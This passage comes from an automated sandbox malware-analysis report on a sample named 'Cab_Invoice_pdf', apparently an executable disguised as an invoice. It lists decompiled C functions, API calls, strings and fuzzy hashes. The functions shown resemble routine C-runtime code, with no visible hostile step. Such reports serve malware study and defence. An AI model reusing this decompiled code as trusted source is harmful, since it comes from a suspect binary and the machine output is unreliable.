                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free
                            • String ID: TMP
                            • API String ID: 269201875-3125297090
                            • Opcode ID: ade9bc80a08007bfed3409155f986210b5d08a1c8ae3f0ec314938a2cf51845e
                            • Instruction ID: f3731e3e79587a18801af4c8c17b64d64b0237083e621961140dc6421baf6656
                            • Opcode Fuzzy Hash: ade9bc80a08007bfed3409155f986210b5d08a1c8ae3f0ec314938a2cf51845e
                            • Instruction Fuzzy Hash: 9321F6BE50461A6FE7197E5EAC818BF67ACEE8657C325001AFD049B244DA30DC0A4264
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 40%
                            			E013127A0(void* __edx, signed int _a8192, char* _a8200) {
                            				short _v0;
                            				signed int _t9;
                            				long _t12;
                            				signed int _t14;
                            				void* _t26;
                            				char* _t28;
                            				signed int _t32;
                            				signed int _t33;
                            
                            				_t26 = __edx;
                            				E01317880();
                            				_t9 =  *0x133c008; // 0xa3433343
                            				_a8192 = _t9 ^ _t32;
                            				_t28 = _a8200;
                            				_t12 = GetModuleFileNameW(0,  &_v0, 0x1000);
                            				_t39 = _t12;
                            				if(_t12 != 0) {
                            					_t14 = E01314C90(_t28,  &_v0, 0x1000);
                            					_t33 = _t32 + 0xc;
                            					__eflags = _t14;
                            					if(__eflags != 0) {
                            						__eflags = _a8192 ^ _t33;
                            						E0131786A();
                            						return 1;
                            					} else {
                            						_push("Failed to convert executable path to UTF-8.");
                            						E01311910(__eflags);
                            						__eflags = _a8192 ^ _t33 + 0x00000004;
                            						E0131786A();
                            						return 0;
                            					}
                            				} else {
                            					_push("Failed to get executable path.");
                            					_push("GetModuleFileNameW");
                            					E01311860(_t26, _t39);
                            					E0131786A();
                            					return 0;
                            				}
                            			}












                            APIs
                            • GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,013124BA,?,?), ref: 013127CC
                              • Part of subcall function 01311860: GetLastError.KERNEL32(?,?), ref: 0131187D
                            Strings
                            • Failed to convert executable path to UTF-8., xrefs: 01312817
                            • GetModuleFileNameW, xrefs: 013127DB
                            • Failed to get executable path., xrefs: 013127D6
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ErrorFileLastModuleName
                            • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                            • API String ID: 2776309574-482168174
                            • Opcode ID: bef26021d22a708a7d6714b7cda39d973027c3753a1536e808d8574d1aafe37f
                            • Instruction ID: a205a57fdbf7f40491a2f4eb9c8ac3401cfe10d7a7d75353fa6430564aee038c
                            • Opcode Fuzzy Hash: bef26021d22a708a7d6714b7cda39d973027c3753a1536e808d8574d1aafe37f
                            • Instruction Fuzzy Hash: 4901D8717103056BF63CA739DC8BBEB76D9AF94708F840429FE09C228AF6649504C69B
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 75%
                            			E01324658(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
                            				signed int _v8;
                            				signed int _v12;
                            				signed int _v16;
                            				unsigned int _v20;
                            				signed int _v28;
                            				signed int _v32;
                            				signed int _v36;
                            				char _v40;
                            				intOrPtr _v48;
                            				char _v52;
                            				void* __ebx;
                            				void* __edi;
                            				void* _t86;
                            				signed int _t92;
                            				signed int _t93;
                            				signed int _t94;
                            				signed int _t100;
                            				void* _t101;
                            				void* _t102;
                            				void* _t104;
                            				void* _t107;
                            				void* _t109;
                            				void* _t111;
                            				void* _t115;
                            				char* _t116;
                            				void* _t119;
                            				signed int _t121;
                            				signed int _t128;
                            				signed int* _t129;
                            				signed int _t136;
                            				signed int _t137;
                            				char _t138;
                            				signed int _t139;
                            				signed int _t142;
                            				signed int _t146;
                            				signed int _t151;
                            				char _t156;
                            				char _t157;
                            				void* _t161;
                            				unsigned int _t162;
                            				signed int _t164;
                            				signed int _t166;
                            				signed int _t170;
                            				void* _t171;
                            				signed int* _t172;
                            				signed int _t174;
                            				signed int _t181;
                            				signed int _t182;
                            				signed int _t183;
                            				signed int _t184;
                            				signed int _t185;
                            				signed int _t186;
                            				signed int _t187;
                            
                            				_t171 = __edx;
                            				_t181 = _a24;
                            				if(_t181 < 0) {
                            					_t181 = 0;
                            				}
                            				_t184 = _a8;
                            				 *_t184 = 0;
                            				E0131AFAE(0,  &_v52, _t171, _a36);
                            				_t5 = _t181 + 0xb; // 0xb
                            				if(_a12 > _t5) {
                            					_t172 = _a4;
                            					_t142 = _t172[1];
                            					_v36 =  *_t172;
                            					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
                            					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
                            						L11:
                            						__eflags = _t142 & 0x80000000;
                            						if((_t142 & 0x80000000) != 0) {
                            							 *_t184 = 0x2d;
                            							_t184 = _t184 + 1;
                            							__eflags = _t184;
                            						}
                            						__eflags = _a28;
                            						_v16 = 0x3ff;
                            						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
                            						__eflags = _t172[1] & 0x7ff00000;
                            						_v32 = _t136;
                            						_t86 = 0x30;
                            						if((_t172[1] & 0x7ff00000) != 0) {
                            							 *_t184 = 0x31;
                            							_t185 = _t184 + 1;
                            							__eflags = _t185;
                            						} else {
                            							 *_t184 = _t86;
                            							_t185 = _t184 + 1;
                            							_t164 =  *_t172 | _t172[1] & 0x000fffff;
                            							__eflags = _t164;
                            							if(_t164 != 0) {
                            								_v16 = 0x3fe;
                            							} else {
                            								_v16 = _v16 & _t164;
                            							}
                            						}
                            						_t146 = _t185;
                            						_t186 = _t185 + 1;
                            						_v28 = _t146;
                            						__eflags = _t181;
                            						if(_t181 != 0) {
                            							_t30 = _v48 + 0x88; // 0xffce8305
                            							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
                            						} else {
                            							 *_t146 = 0;
                            						}
                            						_t92 = _t172[1] & 0x000fffff;
                            						__eflags = _t92;
                            						_v20 = _t92;
                            						if(_t92 > 0) {
                            							L23:
                            							_t33 =  &_v8;
                            							 *_t33 = _v8 & 0x00000000;
                            							__eflags =  *_t33;
                            							_t147 = 0xf0000;
                            							_t93 = 0x30;
                            							_v12 = _t93;
                            							_v20 = 0xf0000;
                            							do {
                            								__eflags = _t181;
                            								if(_t181 <= 0) {
                            									break;
                            								}
                            								_t119 = E0132F230( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                            								_t161 = 0x30;
                            								_t121 = _t119 + _t161 & 0x0000ffff;
                            								__eflags = _t121 - 0x39;
                            								if(_t121 > 0x39) {
                            									_t121 = _t121 + _t136;
                            									__eflags = _t121;
                            								}
                            								_t162 = _v20;
                            								_t172 = _a4;
                            								 *_t186 = _t121;
                            								_t186 = _t186 + 1;
                            								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
                            								_t147 = _t162 >> 4;
                            								_t93 = _v12 - 4;
                            								_t181 = _t181 - 1;
                            								_v20 = _t162 >> 4;
                            								_v12 = _t93;
                            								__eflags = _t93;
                            							} while (_t93 >= 0);
                            							__eflags = _t93;
                            							if(_t93 < 0) {
                            								goto L39;
                            							}
                            							_t115 = E0132F230( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                            							__eflags = _t115 - 8;
                            							if(_t115 <= 8) {
                            								goto L39;
                            							}
                            							_t116 = _t186 - 1;
                            							_t138 = 0x30;
                            							while(1) {
                            								_t156 =  *_t116;
                            								__eflags = _t156 - 0x66;
                            								if(_t156 == 0x66) {
                            									goto L33;
                            								}
                            								__eflags = _t156 - 0x46;
                            								if(_t156 != 0x46) {
                            									_t139 = _v32;
                            									__eflags = _t116 - _v28;
                            									if(_t116 == _v28) {
                            										_t57 = _t116 - 1;
                            										 *_t57 =  *(_t116 - 1) + 1;
                            										__eflags =  *_t57;
                            									} else {
                            										_t157 =  *_t116;
                            										__eflags = _t157 - 0x39;
                            										if(_t157 != 0x39) {
                            											 *_t116 = _t157 + 1;
                            										} else {
                            											 *_t116 = _t139 + 0x3a;
                            										}
                            									}
                            									goto L39;
                            								}
                            								L33:
                            								 *_t116 = _t138;
                            								_t116 = _t116 - 1;
                            							}
                            						} else {
                            							__eflags =  *_t172;
                            							if( *_t172 <= 0) {
                            								L39:
                            								__eflags = _t181;
                            								if(_t181 > 0) {
                            									_push(_t181);
                            									_t111 = 0x30;
                            									_push(_t111);
                            									_push(_t186);
                            									E01318520(_t181);
                            									_t186 = _t186 + _t181;
                            									__eflags = _t186;
                            								}
                            								_t94 = _v28;
                            								__eflags =  *_t94;
                            								if( *_t94 == 0) {
                            									_t186 = _t94;
                            								}
                            								__eflags = _a28;
                            								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                            								_t174 = _a4[1];
                            								_t100 = E0132F230( *_a4, 0x34, _t174);
                            								_t137 = 0;
                            								_t151 = (_t100 & 0x000007ff) - _v16;
                            								__eflags = _t151;
                            								asm("sbb ebx, ebx");
                            								if(__eflags < 0) {
                            									L47:
                            									 *(_t186 + 1) = 0x2d;
                            									_t187 = _t186 + 2;
                            									__eflags = _t187;
                            									_t151 =  ~_t151;
                            									asm("adc ebx, 0x0");
                            									_t137 =  ~_t137;
                            									goto L48;
                            								} else {
                            									if(__eflags > 0) {
                            										L46:
                            										 *(_t186 + 1) = 0x2b;
                            										_t187 = _t186 + 2;
                            										L48:
                            										_t182 = _t187;
                            										_t101 = 0x30;
                            										 *_t187 = _t101;
                            										__eflags = _t137;
                            										if(__eflags < 0) {
                            											L56:
                            											__eflags = _t187 - _t182;
                            											if(_t187 != _t182) {
                            												L60:
                            												_push(0);
                            												_push(0xa);
                            												_push(_t137);
                            												_push(_t151);
                            												_t102 = E0132F150();
                            												_v32 = _t174;
                            												 *_t187 = _t102 + 0x30;
                            												_t187 = _t187 + 1;
                            												__eflags = _t187;
                            												L61:
                            												_t104 = 0x30;
                            												_t183 = 0;
                            												__eflags = 0;
                            												 *_t187 = _t151 + _t104;
                            												 *(_t187 + 1) = 0;
                            												goto L62;
                            											}
                            											__eflags = _t137;
                            											if(__eflags < 0) {
                            												goto L61;
                            											}
                            											if(__eflags > 0) {
                            												goto L60;
                            											}
                            											__eflags = _t151 - 0xa;
                            											if(_t151 < 0xa) {
                            												goto L61;
                            											}
                            											goto L60;
                            										}
                            										if(__eflags > 0) {
                            											L51:
                            											_push(0);
                            											_push(0x3e8);
                            											_push(_t137);
                            											_push(_t151);
                            											_t107 = E0132F150();
                            											_v32 = _t174;
                            											 *_t187 = _t107 + 0x30;
                            											_t187 = _t187 + 1;
                            											__eflags = _t187 - _t182;
                            											if(_t187 != _t182) {
                            												L55:
                            												_push(0);
                            												_push(0x64);
                            												_push(_t137);
                            												_push(_t151);
                            												_t109 = E0132F150();
                            												_v32 = _t174;
                            												 *_t187 = _t109 + 0x30;
                            												_t187 = _t187 + 1;
                            												__eflags = _t187;
                            												goto L56;
                            											}
                            											L52:
                            											__eflags = _t137;
                            											if(__eflags < 0) {
                            												goto L56;
                            											}
                            											if(__eflags > 0) {
                            												goto L55;
                            											}
                            											__eflags = _t151 - 0x64;
                            											if(_t151 < 0x64) {
                            												goto L56;
                            											}
                            											goto L55;
                            										}
                            										__eflags = _t151 - 0x3e8;
                            										if(_t151 < 0x3e8) {
                            											goto L52;
                            										}
                            										goto L51;
                            									}
                            									__eflags = _t151;
                            									if(_t151 < 0) {
                            										goto L47;
                            									}
                            									goto L46;
                            								}
                            							}
                            							goto L23;
                            						}
                            					}
                            					__eflags = 0;
                            					if(0 != 0) {
                            						goto L11;
                            					} else {
                            						_t183 = E0132495B(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
                            						__eflags = _t183;
                            						if(_t183 == 0) {
                            							_t128 = E013187B0(_t184, 0x65);
                            							_pop(_t166);
                            							__eflags = _t128;
                            							if(_t128 != 0) {
                            								__eflags = _a28;
                            								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                            								__eflags = _t170;
                            								 *_t128 = _t170;
                            								 *((char*)(_t128 + 3)) = 0;
                            							}
                            							_t183 = 0;
                            						} else {
                            							 *_t184 = 0;
                            						}
                            						goto L62;
                            					}
                            				} else {
                            					_t129 = E0131C9CE();
                            					_t183 = 0x22;
                            					 *_t129 = _t183;
                            					E01321788();
                            					L62:
                            					if(_v40 != 0) {
                            						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
                            					}
                            					return _t183;
                            				}
                            			}

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: __alldvrm$_strrchr
                            • String ID:
                            • API String ID: 1036877536-0
                            • Opcode ID: 2dfccee33d1e5e66d80ff58c22bb23c19375d490210077c4cf8c0c7b90620e05
                            • Instruction ID: 37408c50be862385cf85ac23bfa52516f9be958e5176de40648c675eb74b8eca
                            • Opcode Fuzzy Hash: 2dfccee33d1e5e66d80ff58c22bb23c19375d490210077c4cf8c0c7b90620e05
                            • Instruction Fuzzy Hash: A3A19A72E103A69FE722EF2CC8907AEBFE5EF52318F18416DD6A59B381C2758941C750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0131CBFB(signed int __edx, intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr* _a16) {
                            				signed int _v8;
                            				intOrPtr _v16;
                            				intOrPtr _v28;
                            				intOrPtr _v32;
                            				intOrPtr _v36;
                            				intOrPtr _v40;
                            				intOrPtr _v44;
                            				void _v48;
                            				char _v64;
                            				void _v72;
                            				long _v76;
                            				intOrPtr _v80;
                            				char _v84;
                            				void* __ebx;
                            				signed int _t53;
                            				intOrPtr _t66;
                            				signed int _t68;
                            				int _t70;
                            				signed int _t81;
                            				signed int _t83;
                            				signed int _t85;
                            				intOrPtr _t98;
                            				signed int _t104;
                            				signed int _t109;
                            				signed int _t111;
                            				signed int _t118;
                            				void* _t121;
                            				intOrPtr* _t128;
                            				signed int _t130;
                            				intOrPtr _t140;
                            
                            				_t118 = __edx;
                            				_t53 =  *0x133c008; // 0xa3433343
                            				_v8 = _t53 ^ _t130;
                            				_t128 = _a16;
                            				_t121 = _a12;
                            				_v80 = _a4;
                            				_v76 = _t121;
                            				_t104 = GetFileType(_t121) & 0xffff7fff;
                            				if(_t104 != 1) {
                            					__eflags = _t104 - 2;
                            					if(_t104 == 2) {
                            						L16:
                            						__eflags = _t104 - 2;
                            						 *((short*)(_t128 + 6)) = ((0 | _t104 != 0x00000002) - 0x00000001 & 0x00001000) + 0x1000;
                            						 *((short*)(_t128 + 8)) = 1;
                            						_t66 = _a8;
                            						 *((intOrPtr*)(_t128 + 0x10)) = _t66;
                            						 *_t128 = _t66;
                            						__eflags = _t104 - 2;
                            						if(_t104 != 2) {
                            							_t70 = PeekNamedPipe(_t121, 0, 0, 0,  &_v76, 0);
                            							__eflags = _t70;
                            							if(_t70 != 0) {
                            								 *((intOrPtr*)(_t128 + 0x14)) = _v76;
                            							}
                            						}
                            						_t68 = 1;
                            						__eflags = 1;
                            						L20:
                            						E0131786A();
                            						return _t68;
                            					}
                            					__eflags = _t104 - 3;
                            					if(_t104 == 3) {
                            						goto L16;
                            					}
                            					__eflags = _t104;
                            					if(_t104 != 0) {
                            						L15:
                            						E0131C998(GetLastError());
                            						L14:
                            						_t68 = 0;
                            						goto L20;
                            					}
                            					 *((intOrPtr*)(E0131C9CE())) = 9;
                            					goto L14;
                            				}
                            				 *((short*)(_t128 + 8)) = 1;
                            				_t74 = _v80;
                            				if(_v80 == 0) {
                            					L4:
                            					_t109 = 0xa;
                            					memset( &_v48, 0, _t109 << 2);
                            					if(E013238BB(0, _t140, _v76, 0,  &_v48, 0x28) == 0) {
                            						goto L15;
                            					}
                            					 *((short*)(_t128 + 6)) = E0131CF2D(0, _v16, _v80);
                            					_t81 = E0131CDB3(_v32, _v28, 0, 0);
                            					 *(_t128 + 0x20) = _t81;
                            					 *(_t128 + 0x24) = _t118;
                            					if((_t81 & _t118) == 0xffffffff) {
                            						goto L14;
                            					}
                            					_t24 = _t128 + 0x20; // 0x83cc758d
                            					_t83 = E0131CDB3(_v40, _v36,  *_t24, _t118);
                            					 *(_t128 + 0x18) = _t83;
                            					 *(_t128 + 0x1c) = _t118;
                            					if((_t83 & _t118) == 0xffffffff) {
                            						goto L14;
                            					}
                            					_t29 = _t128 + 0x24; // 0xcb830cc4
                            					_t30 = _t128 + 0x20; // 0x83cc758d
                            					_t85 = E0131CDB3(_v48, _v44,  *_t30,  *_t29);
                            					 *(_t128 + 0x28) = _t85;
                            					 *(_t128 + 0x2c) = _t118;
                            					_t144 = (_t85 & _t118) - 0xffffffff;
                            					if((_t85 & _t118) == 0xffffffff) {
                            						goto L14;
                            					}
                            					_t111 = 6;
                            					memset( &_v72, 0, _t111 << 2);
                            					if(E013238BB(0, _t144, _v76, 1,  &_v72, 0x18) == 0) {
                            						goto L15;
                            					}
                            					_t39 = _t128 + 0x14; // 0x131cb3d
                            					_t68 = E0131CEFB( &_v64, _t39) & 0xffffff00 | _t95 != 0x00000000;
                            					goto L20;
                            				}
                            				_v84 = 0;
                            				if(E0131CF93(_t74,  &_v84) == 0) {
                            					goto L14;
                            				}
                            				_t98 = _v84 - 1;
                            				_t140 = _t98;
                            				 *((intOrPtr*)(_t128 + 0x10)) = _t98;
                            				 *_t128 = _t98;
                            				goto L4;
                            			}

                            APIs
                            • GetFileType.KERNEL32(?,?,00000000,00000000), ref: 0131CC20
                              • Part of subcall function 0131CF93: __dosmaperr.LIBCMT ref: 0131CFD6
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0131CB29), ref: 0131CD4B
                            • __dosmaperr.LIBCMT ref: 0131CD52
                            • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 0131CD8F
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: __dosmaperr$ErrorFileLastNamedPeekPipeType
                            • String ID:
                            • API String ID: 3955570002-0
                            • Opcode ID: b1e85e53eaef1843b88b1cf9f4abfb7c4a8f6612d3221f72649e1497fba402f6
                            • Instruction ID: 46df20321cc6f39d98b75af13b7c7b74b6df8965eeb132ea2d0f005ff73c70d5
                            • Opcode Fuzzy Hash: b1e85e53eaef1843b88b1cf9f4abfb7c4a8f6612d3221f72649e1497fba402f6
                            • Instruction Fuzzy Hash: 5B51EF72940609AFDB28DFB8CC40AFEBBF9EF08314B149929E556D66A0E7309945CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 94%
                            			E0132CE51(signed int __edx, intOrPtr _a4, intOrPtr _a8, int _a12) {
                            				int _v8;
                            				intOrPtr _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				signed int _t16;
                            				signed int _t17;
                            				int _t20;
                            				signed int _t21;
                            				int _t23;
                            				signed int _t25;
                            				int _t28;
                            				intOrPtr* _t30;
                            				int _t34;
                            				int _t35;
                            				void* _t36;
                            				intOrPtr* _t37;
                            				intOrPtr* _t38;
                            				int _t46;
                            				void* _t54;
                            				void* _t56;
                            				signed int _t58;
                            				int _t61;
                            				int _t63;
                            				void* _t64;
                            				void* _t65;
                            				void* _t66;
                            
                            				_t58 = __edx;
                            				_t59 = _a4;
                            				_t61 = 0;
                            				_t16 = E01322807(_a4, 0, 0, 1);
                            				_v20 = _t16;
                            				_v16 = __edx;
                            				_t65 = _t64 + 0x10;
                            				if((_t16 & __edx) != 0xffffffff) {
                            					_t17 = E01322807(_t59, 0, 0, 2);
                            					_t66 = _t65 + 0x10;
                            					_t51 = _t17 & __edx;
                            					__eflags = (_t17 & __edx) - 0xffffffff;
                            					if((_t17 & __edx) == 0xffffffff) {
                            						goto L1;
                            					}
                            					_t46 = _a8 - _t17;
                            					__eflags = _t46;
                            					_t20 = _a12;
                            					asm("sbb eax, edx");
                            					_v8 = _t20;
                            					if(__eflags < 0) {
                            						L24:
                            						__eflags = _t20 - _t61;
                            						if(__eflags > 0) {
                            							L19:
                            							_t21 = E01322807(_t59, _v20, _v16, _t61);
                            							__eflags = (_t21 & _t58) - 0xffffffff;
                            							if((_t21 & _t58) != 0xffffffff) {
                            								_t23 = 0;
                            								__eflags = 0;
                            								L31:
                            								return _t23;
                            							}
                            							L20:
                            							_t23 =  *((intOrPtr*)(E0131C9CE()));
                            							goto L31;
                            						}
                            						if(__eflags < 0) {
                            							L27:
                            							_t25 = E01322807(_t59, _a8, _a12, _t61);
                            							_t66 = _t66 + 0x10;
                            							__eflags = (_t25 & _t58) - 0xffffffff;
                            							if((_t25 & _t58) == 0xffffffff) {
                            								goto L20;
                            							}
                            							_t28 = SetEndOfFile(E0131E926(_t59));
                            							__eflags = _t28;
                            							if(_t28 != 0) {
                            								goto L19;
                            							}
                            							 *((intOrPtr*)(E0131C9CE())) = 0xd;
                            							_t30 = E0131C9BB();
                            							 *_t30 = GetLastError();
                            							goto L20;
                            						}
                            						__eflags = _t46 - _t61;
                            						if(_t46 >= _t61) {
                            							goto L19;
                            						}
                            						goto L27;
                            					}
                            					if(__eflags > 0) {
                            						L6:
                            						_t63 = E01320B10(_t51, 0x1000, 1);
                            						_pop(_t54);
                            						__eflags = _t63;
                            						if(_t63 != 0) {
                            							_v12 = E0131D960(_t54, _t59, 0x8000);
                            							_t34 = _v8;
                            							_pop(_t56);
                            							do {
                            								__eflags = _t34;
                            								if(__eflags < 0) {
                            									L13:
                            									_t35 = _t46;
                            									L14:
                            									_t36 = E0132308B(_t59, _t63, _t35);
                            									_t66 = _t66 + 0xc;
                            									__eflags = _t36 - 0xffffffff;
                            									if(_t36 == 0xffffffff) {
                            										_t37 = E0131C9BB();
                            										__eflags =  *_t37 - 5;
                            										if( *_t37 == 5) {
                            											 *((intOrPtr*)(E0131C9CE())) = 0xd;
                            										}
                            										L23:
                            										_t38 = E0131C9CE();
                            										E013209EB(_t63);
                            										_t23 =  *_t38;
                            										goto L31;
                            									}
                            									asm("cdq");
                            									_t46 = _t46 - _t36;
                            									_t34 = _v8;
                            									asm("sbb eax, edx");
                            									_v8 = _t34;
                            									__eflags = _t34;
                            									if(__eflags > 0) {
                            										L12:
                            										_t35 = 0x1000;
                            										goto L14;
                            									}
                            									if(__eflags < 0) {
                            										break;
                            									}
                            									goto L17;
                            								}
                            								if(__eflags > 0) {
                            									goto L12;
                            								}
                            								__eflags = _t46 - 0x1000;
                            								if(_t46 < 0x1000) {
                            									goto L13;
                            								}
                            								goto L12;
                            								L17:
                            								__eflags = _t46;
                            							} while (_t46 != 0);
                            							E0131D960(_t56, _t59, _v12);
                            							E013209EB(_t63);
                            							_t66 = _t66 + 0xc;
                            							_t61 = 0;
                            							__eflags = 0;
                            							goto L19;
                            						}
                            						 *((intOrPtr*)(E0131C9CE())) = 0xc;
                            						goto L23;
                            					}
                            					__eflags = _t46;
                            					if(_t46 <= 0) {
                            						goto L24;
                            					}
                            					goto L6;
                            				}
                            				L1:
                            				return  *((intOrPtr*)(E0131C9CE()));
                            			}

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free
                            • String ID:
                            • API String ID: 269201875-0
                            • Opcode ID: ada248b5bd3347f43ec1d24ef7e4408541db6ff9a9345d998ff26c9ede1c8b05
                            • Instruction ID: 6a8371eefd091abc7d88622678c3f8378c6bd9c98afdf8dbe5d8316ba38fca1b
                            • Opcode Fuzzy Hash: ada248b5bd3347f43ec1d24ef7e4408541db6ff9a9345d998ff26c9ede1c8b05
                            • Instruction Fuzzy Hash: 1F414832A402367BDB357BBC8C80EBE3EA9EF1267CF141215F51DD6194D674894983A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 83%
                            			E01328041(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                            				signed int _v8;
                            				int _v12;
                            				char _v16;
                            				intOrPtr _v24;
                            				char _v28;
                            				void* _v40;
                            				void* __ebx;
                            				void* __edi;
                            				signed int _t34;
                            				signed int _t40;
                            				int _t45;
                            				int _t52;
                            				void* _t53;
                            				void* _t55;
                            				int _t57;
                            				signed int _t63;
                            				int _t67;
                            				short* _t71;
                            				signed int _t72;
                            				short* _t73;
                            
                            				_t34 =  *0x133c008; // 0xa3433343
                            				_v8 = _t34 ^ _t72;
                            				_push(_t53);
                            				E0131AFAE(_t53,  &_v28, __edx, _a4);
                            				_t57 = _a24;
                            				if(_t57 == 0) {
                            					_t52 =  *(_v24 + 8);
                            					_t57 = _t52;
                            					_a24 = _t52;
                            				}
                            				_t67 = 0;
                            				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                            				_v12 = _t40;
                            				if(_t40 == 0) {
                            					L15:
                            					if(_v16 != 0) {
                            						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                            					}
                            					E0131786A();
                            					return _t67;
                            				}
                            				_t55 = _t40 + _t40;
                            				asm("sbb eax, eax");
                            				if((_t55 + 0x00000008 & _t40) == 0) {
                            					_t71 = 0;
                            					L11:
                            					if(_t71 != 0) {
                            						E01318520(_t67, _t71, _t67, _t55);
                            						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
                            						if(_t45 != 0) {
                            							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
                            						}
                            					}
                            					L14:
                            					E0132815E(_t71);
                            					goto L15;
                            				}
                            				asm("sbb eax, eax");
                            				_t47 = _t40 & _t55 + 0x00000008;
                            				_t63 = _t55 + 8;
                            				if((_t40 & _t55 + 0x00000008) > 0x400) {
                            					asm("sbb eax, eax");
                            					_t71 = E01320A25(_t63, _t47 & _t63);
                            					if(_t71 == 0) {
                            						goto L14;
                            					}
                            					 *_t71 = 0xdddd;
                            					L9:
                            					_t71 =  &(_t71[4]);
                            					goto L11;
                            				}
                            				asm("sbb eax, eax");
                            				E0132F250();
                            				_t71 = _t73;
                            				if(_t71 == 0) {
                            					goto L14;
                            				}
                            				 *_t71 = 0xcccc;
                            				goto L9;
                            			}

                            APIs
                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,01323E2E,?,00000000,?,00000001,?,?,00000001,01323E2E,?), ref: 0132808E
                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 01328117
                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,01320C3C,?), ref: 01328129
                            • __freea.LIBCMT ref: 01328132
                              • Part of subcall function 01320A25: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,013280E5,00000000,?,01320C3C,?,00000008,?,01323E2E,?,?,?), ref: 01320A57
                            Memory Dump Source
